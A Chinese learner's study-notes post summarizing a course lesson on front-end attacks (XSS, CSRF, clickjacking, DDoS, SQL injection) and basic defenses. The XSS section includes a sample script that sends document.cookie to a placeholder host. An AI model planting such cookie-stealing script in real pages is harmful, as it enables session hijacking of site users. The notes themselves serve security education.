为了账号安全,请及时绑定邮箱和手机立即绑定
首页 手记 【九月打开】第13天 前端攻击手段有哪些,如何预防?

【九月打开】第13天 前端攻击手段有哪些,如何预防?

2022.09.19 21:47 41浏览

第一模块(课程信息):

课程名称:2周刷完100道前端优质面试真题
课程章节:第六章第十四节 前端攻击手段有哪些,该如何预防?
主讲老师:双越

第二模块(课程内容):

课程内容概述

预防前端攻击到底前端做还是后端做?两个人不可以踢皮球,谁也推卸不了责任,不可以独善其身。
前端可以做前端的预防攻击,后端做后端的预防攻击,可以用特殊字符替换的方式。

一、XSS攻击

  • Cross Site Script跨站脚本攻击
  • 手段:黑客将js代码插入到网页内容中,渲染时执行js代码
  • 预防:特殊字符替换(前端或者后端)
<script>
var img = document.createElement('image');
img.src='https://xxx.com/api/xxx?cookie='+document.cookie
</scropt>

vue和react能够默认屏蔽掉xss攻击
vue:v-html除外
react:dangerouslySetInnerHTML***除外

二、CSRF

  • Cross Site Request Forgery 跨站请求伪造
  • 手段:黑客诱导用户访问另一个网站的接口,伪造请求
  • 预防:严格的跨域验证+验证码机制

详细过程

  • 用户登录A网站,有了cookie
  • 黑客诱导到B网站,并发起A网站的请求
  • A网站发现API有cookie,认为是用户自己操作的

预防手段:

  • 严格的跨域请求限制,判断referrer(请求来源)
  • 为cookie设置SameSite,禁止跨域传递cookie

三、点击劫持

  • Click Jacking
  • 手段:诱导界面上蒙一个透明的iframe,诱导用户点击
  • 预防:让iframe不能跨域加载

四、DDos

  • Distribute denial-of-service分布式拒绝服务
  • 手段:分布式的、大规模的流量访问,使服务器瘫痪
  • 预防:需要硬件预防,如阿里云的WAF

五、SQL注入

  • 手段:黑客提交内容时写入SQL语句,破坏数据库
  • 预防:处理输入的内容,替换特殊字符

第三模块(学习心得):

学习了5种前端攻击的手段和预防方法。

  1. XSS
  2. CSRF
  3. 点击劫持
  4. DDos
  5. SQL注入

第四模块(学习截图):

图片描述
图片描述
图片描述
图片描述

点击查看更多内容
0人点赞

若觉得本文不错,就分享一下吧!

评论

作者其他优质文章

正在加载中
Web前端工程师
手记
粉丝
9
获赞与收藏
4

关注TA,一起探索更多经验知识

同主题相似文章浏览排行榜

风间影月说签约讲师

50篇手记,涉及Java、MySQL、Redis、Spring等方向

进入讨论

Tony Bai 说签约讲师

146篇手记,涉及Go、C、Java、Python等方向

进入讨论
感谢您的支持,我会继续努力的~
扫码打赏,你说多少就多少
赞赏金额会直接到老师账户
支付方式
打开微信扫一扫,即可进行扫码打赏哦
意见反馈 帮助中心 APP下载
官方微信

举报

0/150
提交
取消